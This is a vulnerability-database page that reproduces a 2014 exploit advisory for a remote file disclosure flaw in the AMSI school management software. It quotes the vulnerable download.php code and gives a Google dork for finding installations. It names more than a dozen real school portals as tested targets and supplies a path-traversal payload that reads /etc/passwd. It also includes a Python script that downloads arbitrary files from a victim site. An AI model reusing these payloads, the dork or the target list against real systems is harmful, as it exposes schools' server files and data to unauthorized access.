Vulners
Lucene search
AMSI 3.20.47 Build 37 File Disclosure
` .__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[~] Exploit Developed by : B3mB4m
[~] HomePage : http://h4x0resec.blogspot.com
[~] Guzel Insanlar : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : AMSI ( Academia management solutions international )
|~Affected Version : v3.20.47 build 37
|~Software : http://amsi.ae - http://iconnect.ae
|~RISK : Medium
|~Google Keyword/Dork : inurl:"?load=news/search_news"
|~Tested On : [L] Kali Linux \ [R] example sites
####################INFO################################
makes it possible to read all the files from the local base.
#######################################################
### Error Line in 'download.php' ##
..
$path = str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']);
// $path = $_GET['file'];
header("Content-Description: File Transfer");
header("Content-Type: application/force-download");
//header("Content-Disposition: attachment; filename=" . basename($path . $uri[1]));
header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" );
@readfile($path);
..
########################################################
Example and tested on;
http://portal.iconnect.ae/
http://demo.iconnect.ae/
http://barsha.almawakeb.sch.ae/
http://portal.naischool.ae/
http://portal.ias-dubai.ae/
http://portal.madarschool.ae/
http://portal.isas.sch.ae/
http://portal.alsanawbarschool.com/
http://fia.fischools.com/
http://portal.ajyal.sch.ae/
http://portal.arabunityschool.com/
http://alnashaa.sch.ae/
http://portal.aaess.com/
############################################################
Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd
############################################################
=========Automatic File Source Downloader Exploit ========
##################### exploit.py ##############################
# Coded by b3mb4m
import random
import os
import urllib
class B3mB4m(object):
def example(self):
print """
How to use ?
Website: http://VICTIM.com
Path : /download.php?file=../../../../etc/passwd
"""
def exploit(self):
ask = raw_input("Website :")
uz = raw_input("Path : ")
#ask = "http://alnashaa.sch.ae"
#uz = "/download.php?file=../../../../etc/passwd"
uniq = str(random.randrange(1,1000+1))+".txt"
filee = ask+uz
try:
urllib.urlretrieve(filee, uniq);
print "\t\nDownload complate ! "
os.startfile(uniq)
except:
B3mB4m().example()
if __name__ == '__main__':
B3mB4m().exploit()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Dec 2014 00:00Current
7.4High risk
Vulners AI Score7.4